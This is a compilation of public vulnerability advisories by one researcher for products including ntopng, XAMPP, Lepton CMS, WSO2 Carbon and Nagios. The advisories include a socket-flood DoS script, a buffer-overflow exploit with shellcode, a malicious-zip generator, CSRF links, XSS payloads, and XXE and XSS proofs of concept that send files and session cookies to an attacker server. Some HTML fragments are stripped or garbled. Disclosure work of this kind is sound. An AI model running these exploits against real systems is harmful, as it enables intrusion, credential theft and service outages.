prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
NTOPNG Web Interface v2.4 CSRF Token Bypass
[+]# [+] Credits / Discovery: John Page AKA Hyp3rlinX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/NTOPNG-CSRF-TOKEN-BYPASS.txt [+] ISR: ApparitionSEC [+]# Vendor: www.ntop.org Product: ntopng Web Interface v2.4.160627 ntopng is the next generation version of the original ntop, a network traffic probe that shows the network usage, similar to what the popular top Unix command does. ntopng is based on libpcap and it has been written in a portable way in order to virtually run on every Unix platform, MacOSX and on Windows as well. Vulnerability Type: == CSRF Token Bypass CVE Reference: CVE-2017-5473 Security Issue: = By simply omitting the CSRF token or supplying arbitrary token values will bypass CSRF protection when making HTTP requests, to the ntopng web interface. Allowing remote attackers the rights to make HTTP requests on an authenticated users behalf, if the user clicks an malicious link or visits an attacker webpage etc. Exploit/POC: 1) Change admin password http://VICTIM-SERVER:3000/lua/admin/password_reset.lua?csrf=NOT-EVEN-CHECKED=admin_password=xyz123_new_password=xyz123 2) Add arbitrary http://VICTIM-SERVER:3000/lua/admin/add_user.lua?csrf=NOT-EVEN-CHECKED; method="GET"> document.forms[0].submit() Disclosure Timeline: = Vendor Notification: January 11, 2017 Vendor acknowledgement: January 12, 2017 Vendor Fixed Issue January 20, 2017 : Public Disclosure Network Access: === Remote Impact: == Information Disclosure Privilege Escalation Severity: === High [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c) HYP3RLINX - Apparition Hyp3rlinX
XAMPP Control Panel Memory Corruption Denial Of Service
[+] Credits: John Page (hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/XAMPP-CONTROL-PANEL-MEMORY-CORRUPTION-DOS.txt
[+] ISR: ApparitionSec
Vendor:
=
www.apachefriends.org
Product:
===
XAMPP Control Panel
XAMPP is a free and open source cross-platform web server solution stack
package developed by Apache Friends,
consisting mainly of the Apache HTTP Server, MariaDB database, and interpreters
for scripts written in the PHP
and Perl programming languages.
Vulnerability Type:
=
Memory Corruption DOS
CVE Reference:
==
N/A
Vulnerability Details:
=
XAMPP Control Panel crashes with access violation when writing junk bytes into
several different ports e.g.
Tested following ports / versions:
(MySQL) 3306 v3.2.2
(Tomcat) 8080 (XAMPP v3.1.0)
(FileZilla) 21
(Mercury Mail) 25 (XAMPP v3.1.0),79,105,106,143.
It is not that XAMPP Control Panel is listening on some port, however memory
corruption and Denial Of Service does
occur when you constantly write junk into, for instance, the MySQL, Tomcat,
FileZilla, Mercury Mail listening ports.
1) Launch XAMPP control panel
2) Run exploit script against some ports like 3306, 79, 105 (Mercury mail) with
Apache running and or Tomcat
Target different services and port combinations to reproduce.
Important to note is that neither MySQL or Apache itself crash, it IS the XAMPP
Control Panel that crashes with Access Violation.
Tested Windows SP1
POC Video:
https://vimeo.com/196938261
Exploit code(s):
===
import socket
print "XAMPP Control Panel DOS"
print "Discovery: John Page (hyp3rlinx)"
print "ApparitionSec"
print "hyp3rlinx.altervista.org\r\n"
IP = raw_input("[IP]> ")
PORT = raw_input("[PORT]> ")
arr=[]
c=0
while 1:
try:
arr.append(socket.create_connection((IP,PORT)))
arr[c].send("DOOM")
print "Die!"
c+=1
except socket.error:
print "[+] Done! "
raw_input()
break
Disclosure Timeline:
===
Vendor Notification: November 1, 2016
Vendor acknowledgement: November 4, 2016
Vendor released Fix : December 22, 2016
(NO public mention as of the time of this writing)
December 24, 2016 : Public Disclosure
Exploitation Technique:
===
Remote
Severity Level:
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
Adobe Animate <= v15.2.1.95 Memory Corruption Vulnerability
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ADOBE-ANIMATE-MEMORY-CORRUPTION-VULNERABILITY.txt [+] ISR: ApparitionSec Vendor: = www.adobe.com Product(s): = Adobe Animate 15.2.1.95 and earlier versions Adobe Animate (formerly Adobe Flash Professional, Macromedia Flash, and FutureSplash Animator) is a multimedia authoring and computer animation program developed by Adobe Systems. Platforms: === Windows / Macintosh Vulnerability Type: === Critical Memory Corruption Vulnerability CVE Reference: == CVE-2016-7866 APSB16-38 Vulnerability Details: = Adobe Animate suffers from a Buffer Overflow when creating .FLA files with ActionScript Classes that use overly long Class names. This causes memory corruption leading to possible arbitrary code execution upon opening a maliciously created .Fla Flash file. Reproduction / POC: 1) Create FLA with overly long Class name in FLA Class publish properties input field. 2) Save and close 3) Reopen FLA, click edit to open the .as script file 4) "ctrl + s" to save then boom access violation Distributed: Create new ".as" ActionScript 3 (AS3) file and give it very long class name in input field then hit "Ctrl+s" to save.. you will crash IDE, next way described is ONE way how attackers can distribute malicious .FLA Abusing JSFL, The Flash JavaScript application programming interface (JavaScript API or JSAPI). 1) Create following .JSFL file fl.getDocumentDOM().save(); fl.getDocumentDOM().testMovie(); 2) Create a MovieClip stored in FLA library with a very long class name that extends MovieClip and export it for ActionScript etc... 3) Drag the MovieClip to the stage 4) Bundle FLA/JSFL file, make avail for download as example on how to use JSFL to call save() / publish() functions. User opens .FLA, runs harmless looking JSFL code then BOOM! Reference: https://helpx.adobe.com/security/products/animate/apsb16-38.html Disclosure Timeline: = Vendor Notification: May 28, 2016 December 13, 2016 : Public Disclosure Exploitation Technique: === Local Severity Level: High [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
Puppet Enterprise Web Interface Authentication Redirect
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/PUPPET-AUTHENTICATION-REDIRECT.txt [+] ISR: ApparitionSec Vendor: == www.puppet.com Product: Puppet Enterprise Web Interface Version < 2016.4.0 Puppet Enterprise is the leading platform for automatically delivering, operating and securing your infrastructure. Vulnerability Type: = Authentication Redirect CVE Reference: == CVE-2016-5715 Vulnerability Details: = When logging into Puppet Enterprise Web Interface, users can be redirected to attacker controlled servers, if a user logs in using an attacker supplied authentication link it can result in credential theft etc. Fixed in version 2016.4.0 References: https://puppet.com/security/cve/cve-2016-5715 Exploit code(s): === Bypass character filters you need to pass double forward slashes "//" or the redirect will fail. https://victim-puppet-server/auth/login?redirect=//attacker-server Disclosure Timeline: == Vendor Notification: August 23, 2016 Vendor Acknowledgement: August 23, 2016 Vendor Releases Fix: in version 2016.4.0 October 17, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: Medium [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. hyp3rlinx
Necroscan <= v0.9.1 Buffer Overflow
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/NECROSCAN-BUFFER-OVERFLOW.txt
[+] ISR: ApparitionSec
Vendor:
===
nscan.hypermart.net
Product:
==
NECROSOFT NScan version <= v0.9.1
ver 0.666 build 13
circa 1999
NScan is one of the most fast and flexible portscanners for Windows. It is
specially designed for scanning large networks and gathering
related network/host information. It supports remote monitoring, usage of host
and port lists, option profiles, speed and accuracy tuning,
etc. It also contains a traceroute, dig and whois, which work together with
scanner.
Vulnerability Type:
Buffer Overflow
Vulnerability Details:
=
dig.exe is a component of Necroscan 'nscan.exe' that performs DNS lookups, this
component has a trivial buffer overflow vulnerability.
1,001 bytes direct EIP overwrite our shellcode will be sitting at ESP register.
Important we need \x2E\x2E in the shellcode! WinExec(calc.exe) as once it is
injected it gets converted to an unusable character and will fail
to execute. However, we can bypass this by double padding our shellcode
\x2E\x2E instead of a single \x2E now it will Execute!
payload="A"*997+"" <= EIP is here
1) use mona or findjmp.exe to get suitable JMP ESP register
2) run python script below to generate exploit payload
3) paste payload into DNS lookup 'Target' input field
4) Click 'TCP lookup' button
5) BOOM see calc.exe run!
Stack dump...
EAX 0021
ECX 2D68
EDX 01C9E8B8
EBX 756EFA00 kernel32.756EFA00
ESP 036BFEE0 ASCII "calc"
EBP 756C2C51 kernel32.WinExec
ESI 002D4A78
EDI 756EFA28 kernel32.756EFA28
EIP 036BFF58
C 0 ES 002B 32bit 0()
P 1 CS 0023 32bit 0()
A 0 SS 002B 32bit 0()
Z 1 DS 002B 32bit 0()
S 0 FS 0053 32bit 7EFD7000(FFF)
T 0 GS 002B 32bit 0()
D 0
O 0 LastErr ERROR_NO_MORE_FILES (0012)
EFL 0246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
3 2 1 0 E S P U O Z D I
FST Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask1 1 1 1 1 1
Exploit code(s):
===
import struct
#Author: hyp3rlinx
#ISR: ApparitionSec
#Site: hyp3rlinx.altervista.org
#
#Necroscan nscan.exe Local Buffer Overflow POC
#dig.exe is a component of Necroscan that does DNS lookups
#this component has a trivial buffer overflow vulnerability.
#payload="A"*1001 #EIP is here
#paste generated exploit into DNS lookup 'Target' input field
#Click 'TCP lookup' button
#BOOM!
#Important need .. \x2E\x2E in the shellcode! (calc.exe)
#Tested successfully Windows 7 SP1
#No suitable JMP register in the vulnerable program, they contain null bytes,
have use !mona jmp -r esp
#plugin or findjmp.exe.
rp=struct.pack("<L", 0x75658BD5) #JMP ESP kernel32
# Modified 'calc.exe' shellcode Windows 7 SP1 for this exploit
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x2E\x65\x78\x65" #<=== \x2E\x2E
(Deal with "." character problem)
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
payload="A"*997+rp+"\x90"*10+sc
file=open("NECRO", "w")
file.write(payload)
file.close()
print '=== Exploit payload created! ==='
print '=== HYP3RLINX | APPARITIONsec ==='
Exploitation Technique:
===
Local
Severity Level:
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
Lepton CMS PHP Code Injection
[+] Credits: John Page (HYP3RLINX)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/LEPTON-PHP-CODE-INJECTION.txt
[+] ISR: ApparitionSec
Vendor:
==
www.lepton-cms.org
Product:
=
Lepton CMS 2.2.0 / 2.2.1 (update)
LEPTON is an easy-to-use but full customizable Content Management System (CMS).
Vulnerability Type:
===
PHP Code Injection
CVE Reference:
==
N/A
Vulnerability Details:
=
No input validation check is done on the "Database User" input field when
entering Lepton CMS setup information using the Install Wizard.
Therefore, a malicious user can input whatever they want in "config.php", this
can allow for PHP Remote Command Execution on the Host system.
e.g.
In the database username field, single quote to close "DB_USERNAME" value then
open our own PHP tags.
');?>
Now in "config.php" the Database username becomes ===> define('DB_USERNAME',
'');?>');
A security check attempt is made by Lepton to disallow making multiple HTTP
requests for "config.php". On line 3 of "config.php" file we find.
///
if(defined('LEPTON_PATH')) { die('By security reasons it is not permitted to
load \'config.php\' twice!!
Forbidden call from \''.$_SERVER['SCRIPT_NAME'].'\'!'); }
///
However, the security check is placed on line 3 way before "LEPTON_PATH" has
been defined allowing complete bypass of that access control check.
Now we can inject our own PHP code into the config allowing Remote Command
Execution or Local/Remote File Includes etc...
Next, make HTTP GET request to "http://victim-server/upload/install/save.php;
again and code execution will be achieved or request "config.php"
directly as the security check made on line 3 of "config.php" to prevent
multiple HTTP requests to "config.php" does NOT work anyhow.
In situations where an installation script is provided as part of a some
default image often available as a convenience by hosting providers, this can
be used to gain code execution on the target system and bypass whatever
security access controls/restrictions etc.
References:
http://www.lepton-cms.org/posts/important-lepton-2.2.2-93.php
Exploit code(s):
===
1) At step 4 of Leptons Install Wizard, enter ');?>
for Database User name, then fill in rest of fields
2) Click go to step 5 and fill in required fields, then click "Install LEPTON"
3) Make HTTP GET request to:
http://localhost/LEPTON_stable_2.2.0/upload/install/save.php
OR
http://localhost/LEPTON_stable_2.2.0/upload/config.php
BOOM pop calc.exe...
Disclosure Timeline:
===
Attempted Vendor Notification: June 11, 2016 (No replies)
Vendor Notification on July 12, 2016 ( thanks Henri Salo )
Vendor Acknowledgement: July 13, 2016
Vendor fixes: July 14, 2016
Vendor release version 2.2.2 : August 12, 2016
August 15, 2016 : Public Disclosure
Severity Level:
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
Lepton CMS Archive Directory Traversal
[+] Credits: John Page (HYP3RLINX)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/LEPTON-ARCHIVE-DIRECTORY-TRAVERSAL.txt
[+] ISR: ApparitionSec
Vendor:
==
www.lepton-cms.org
Product:
=
Lepton CMS 2.2.0 / 2.2.1 (update)
LEPTON is an easy-to-use but full customizable Content Management System (CMS).
Vulnerability Type:
Archive Directory Traversal
CVE Reference:
==
N/A
Vulnerability Details:
=
Lepton has feature that lets users install new modules, if malicious user
uploads an archive and the module is not valid it
will generate an error. However, the malicious archive will still get
decompressed and no check is made for ../ characters in
the file name allowing in arbitrary PHP files to be placed outside the intended
target directory for installed modules. This can
then be used to execute remote commands on the affected host system.
e.g.
We get error message as below.
under "Add Ons" tab Install Module.
Invalid LEPTON installation file. Please check the *.zip format.[1]
Archive still gets decompressed and the malicious file is moved outside of the
intended target directory, by using ../ in file name.
Exploit code(s):
===
";exit();}
$file_name=$argv[1];
$zip = new ZipArchive();
$res = $zip->open("$file_name.zip", ZipArchive::CREATE);
$zip->addFromString("..\..\..\..\..\..\..\..\RCE.php", '');
$zip->close();
echo "Malicious archive created...\r\n";
echo "= hyp3rlinx ";
?>
Disclosure Timeline:
===
Attempted Vendor Notification: June 11, 2016 (No replies)
Vendor Notification on July 12, 2016 ( thanks Henri Salo )
Vendor Acknowledgement: July 13, 2016
Vendor fixes: July 14, 2016
Vendor release version 2.2.2 : August 12, 2016
August 15, 2016 : Public Disclosure
Exploitation Technique:
===
Local
Severity Level:
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
WSO2-CARBON v4.4.5 CSRF / DOS
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-CSRF-DOS.txt
[+] ISR: ApparitionSec
Vendor:
www.wso2.com
Product:
==
Ws02Carbon v4.4.5
WSO2 Carbon is the core platform on which WSO2 middleware products are built.
It is based on Java OSGi technology, which allows
components to be dynamically installed, started, stopped, updated, and
uninstalled, and it eliminates component version conflicts.
In Carbon, this capability translates into a solid core of common middleware
enterprise components, including clustering, security,
logging, and monitoring, plus the ability to add components for specific
features needed to solve a specific enterprise scenario.
Vulnerability Type:
=
Cross Site Request Forgery / DOS
CVE Reference:
==
CVE-2016-4315
Vulnerability Details:
=
The attack involves tricking a privileged user to initiate a request by
clicking a malicious link or visiting an evil webpage to
shutdown WSO2 Servers.
References:
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0101
The getSafeText() Function and conditional logic below processes the "action"
parameter with no check for inbound CSRF attacks.
String cookie = (String)
session.getAttribute(ServerConstants.ADMIN_SERVICE_COOKIE);
String action = CharacterEncoder.getSafeText(request.getParameter("action"));
ServerAdminClient client = new ServerAdminClient(ctx, backendServerURL, cookie,
session);
try {
if ("restart".equals(action)) {
client.restart();
} else if ("restartGracefully".equals(action)) {
client.restartGracefully();
} else if ("shutdown".equals(action)) {
client.shutdown();
} else if ("shutdownGracefully".equals(action)) {
client.shutdownGracefully();
}
} catch (Exception e) {
response.sendError(500, e.getMessage());
return;
}
Exploit code(s):
===
Shutdown the Carbon server
https://victim-server:9443/carbon/server-admin/proxy_ajaxprocessor.jsp?action=shutdown;>Shut
it down!
Disclosure Timeline:
==
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016 : Public Disclosure
Exploitation Technique:
===
Remote
Severity Level:
Medium
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
WSO2 CARBON v4.4.5 PERSISTENT XSS COOKIE THEFT
[+] Credits: John Page aka HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-PERSISTENT-XSS-COOKIE-THEFT.txt [+] ISR: ApparitionSec Vendor: = www.wso2.com Product: == Ws02Carbon v4.4.5 WSO2 Carbon is the core platform on which WSO2 middleware products are built. It is based on Java OSGi technology, which allows components to be dynamically installed, started, stopped, updated, and uninstalled, and it eliminates component version conflicts. In Carbon, this capability translates into a solid core of common middleware enterprise components, including clustering, security, logging, and monitoring, plus the ability to add components for specific features needed to solve a specific enterprise scenario. Vulnerability Type: === Persistent / Reflected Cross Site Scripting (XSS) - Cookie Disclosure CVE Reference: == CVE-2016-4316 Vulnerability Details: = WSo2 Carbon has multiple XSS vectors allowing attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy, stealing session cookies and used as a platform for further attacks on the system. Exploit code(s) === Persistent XSS: GET Request https://victim-server:9443/carbon/identity-mgt/challenges-mgt.jsp?addRowId=XSS="/>alert(document.cookie) Request two is POST /carbon/identity-mgt/challenges-mgt-finish.jsp setName=%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E==City+where+you+were+born+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1=City+where+you+were+born+%3F=Father%27s+middle+name+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1=Father%27s+middle+name+%3F=Name+of+your+first+pet+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2=Name+of+your+first+pet+%3F=Favorite+sport+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2=Favorite+sport+%3F=Favorite+food+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1=Favorite+food+%3F=Favorite+vacation+location+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1=Favorite+vacation+location+%3F=Model+of+your+first+car+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2=Model+of+your+first+car+% 3F=Name+of+the+hospital+where+you+were+born+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2=Name+of+the+hospital+where+you+were+born+%3F=%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E=XSS Then XSS payload will be listed here in below URL: https://victim-server:9443/carbon/identity-mgt/challenges-set-mgt.jsp?region=region1=identity_security_questions_menu Finally when victim clicks to "Delete" entry on the page the XSS is executed. Here is stored payload from the HTML source Delete /// Reflected XSS XSS #1 https://victim-server:9443/carbon/webapp-list/webapp_info.jsp?webappFileName=odata.war=all=victim-server=9763=victim-server=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%20\n\n%27%20%2bdocument.cookie%29%3C/script%3E XSS #2 https://victim-server:9443/carbon/ndatasource/newdatasource.jsp?dsName=%22onMouseMove=%22alert%28%27XSS%20by%20hyp3rlinx%20\n\n%27%2bdocument.cookie%29=HELL XSS #3 https://victim-server:9443/carbon/ndatasource/newdatasource.jsp?description=%22onMouseMove=%22alert%28%27XSS%20by%20hyp3rlinx%20\n\n%27%2bdocument.cookie%29=true XSS #4 https://victim-server:9443/carbon/webapp-list/webapp_info.jsp?webappFileName=odata.war=all=victim-server=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%20\n\n%27%20%2bdocument.cookie%29%3C/script%3E=victim-server= XSS #5 https://victim-server:9443/carbon/viewflows/handlers.jsp?retainlastbc=true=in=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E XSS #6 https://victim-server:9443/carbon/ndatasource/validateconnection-ajaxprocessor.jsp?=WSO2_CARBON_DB=com.mysql.jdbc.Driver=%22/%3E%3Cscript%3Ealert%28666%29%3C/script%3E=root=RDBMS=RDBMS=default=undefined=undefined=undefined=false=true= Disclosure Timeline: === Vendor Notification: May 6, 2016 Vendor Acknowledgement: May 6, 2016 Vendor Fix / Customer Alerts: June 30, 2016 August 12, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: === Medium [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due c
WSO2 IDENTITY-SERVER v5.1.0 XML External-Entity
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WSO2-IDENTITY-SERVER-v5.1.0-XML-External-Entity.txt
[+] ISR: ApparitionSec
Vendor:
=
www.wso2.com
Product:
Wso2 Identity Server v5.1.0
As the industryÂ’s first enterprise identity bus (EIB), WSO2 Identity Server is
the central backbone
that connects and manages multiple identities across applications, APIs, the
cloud, mobile, and Internet
of Things devices, regardless of the standards on which they are based. The
multi-tenant WSO2 Identity Server
can be deployed directly on servers or in the cloud, and has the ability to
propagate identities across geographical
and enterprise borders in a connected business environment.
Vulnerability Type:
XML External Entity / CSRF
CVE Reference(s):
===
CVE-2016-4312 (XXE)
CVE-2016-4311 (CSRF)
Vulnerability Details:
=
WSO2IS XML parser is vulnerable to XXE attack in the XACML flow, this can be
exploited when XML input containing a reference to an
external entity is processed by a weakly configured XML parser. The attack
leads to the disclosure and exfiltration of confidential
data and arbitrary system files, denial of service, server side request
forgery, port scanning from the perspective of the machine
where the parser is located (localhost), and other system impacts.
The exploit can be carried out locally by an internal malicious user or remote
via CSRF if an authenticated user clicks an attacker
supplied link or visits a evil webpage. In case of WSO2IS system files can be
read / exfiltrated to the remote attackers server
for safe keeping -_-
References:
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0096
Exploit code(s):
===
XXE POC, exfiltrate the victims Windows hosts file to our remote server.
1) Form for the XXE POST request.
https://victim-server:9443/carbon/entitlement/eval-policy-submit.jsp?withPDP=false;
method="post">
http://attackserver:8080/payload.dtd;>
%dtd;]>
document.getElementById('XXE').submit()
2) DTD file on attacker server.
http://attackserver:8080?%file;'>">
%all;
3) On attack server create listener for the victims HTTP request.
python -m SimpleHTTPServer 8080
Disclosure Timeline:
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016 : Public Disclosure
Exploitation Technique:
===
Remote
Severity Level:
===
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX
Nagios NA v2.2.1 XSS
[+] Credits: John Page -HYP3RLINX [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/NAGIOS-NA-v2.2.1-XSS.txt [+] ISR: ApparitionSec Vendor: === www.nagios.com Product: == Nagios Network Analyzer v2.2.1 Netflow Analysis, Monitoring, and Bandwidth Utilization Software Network Analyzer provides an in-depth look at all network traffic sources and potential security threats allowing system admins to quickly gather high-level information regarding the health of the network as well as highly granular data for complete and thorough network analysis. Vulnerability Type: == Cross Site Scripting (XSS) CVE Reference: == N/A Vulnerability Details: = Nagios NA has XSS vector which enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. The application seems to filter injecting "document.cookie", however we can bypass this by using document['cookie'] in its place. Exploit code(s): === Steal Session Cookie http://victim-server/nagiosna/index.php/sources/queries/1?q[begindate]=-24+hours[enddate]=-1+second[aggregate_csv]=[qid]=%27%27;window.open(%22http://attacker-server/c.php?c=%22%2bdocument[%27cookie%27])// Disclosure Timeline: == Vendor Notification: July 20, 2016 Vendor Acknowledgement: July 21, 2016 Vendor Fix / Release: August 1, 2016 August 8, 2016 : Public Disclosure Exploitation Technique: === Remote Severity Level: Low [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. HYP3RLINX
AirSnort v0.2.7 Stack Corruption DOS
[+] Credits: Hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AIRSNORT-STACK-CORRUPTION-DOS.txt [+] ISR: ApparitionSec Vendor: == sourceforge.net/projects/airsnort/ Product: === AirSnort v0.2.7 AirSnort is a wireless LAN (WLAN) tool which cracks encryption keys on 802.11b WEP networks. AirSnort operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. Vulnerability Type: === Stack Corruption DOS Vulnerability Details: = When open / load a corrupt 'crackfile' with bunch of 'AA's... airsnort crashes and stack is corrupted. Under File / Load "Crack" File... open corrupt crackfile with bunch of 'A' chars then BOOM... Tested successfully on Linux OS. GDB reg dump Program received signal SIGSEGV, Segmentation fault. 0xb72780e5 in __mempcpy_ia32 () from /lib/libc.so.6 (gdb) info r eax0x4141413b 1094795579 ecx0x3e3995 edx0x829e9d8136964568 ebx0xb73c1000 -1220800512 esp0xbfffe1dc 0xbfffe1dc ebp0x0 0x0 esi0xb67cf00a -1233326070 edi0x0 0 eip0xb72780e5 0xb72780e5 <__mempcpy_ia32+21> eflags 0x210203 [ CF IF RF ID ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting 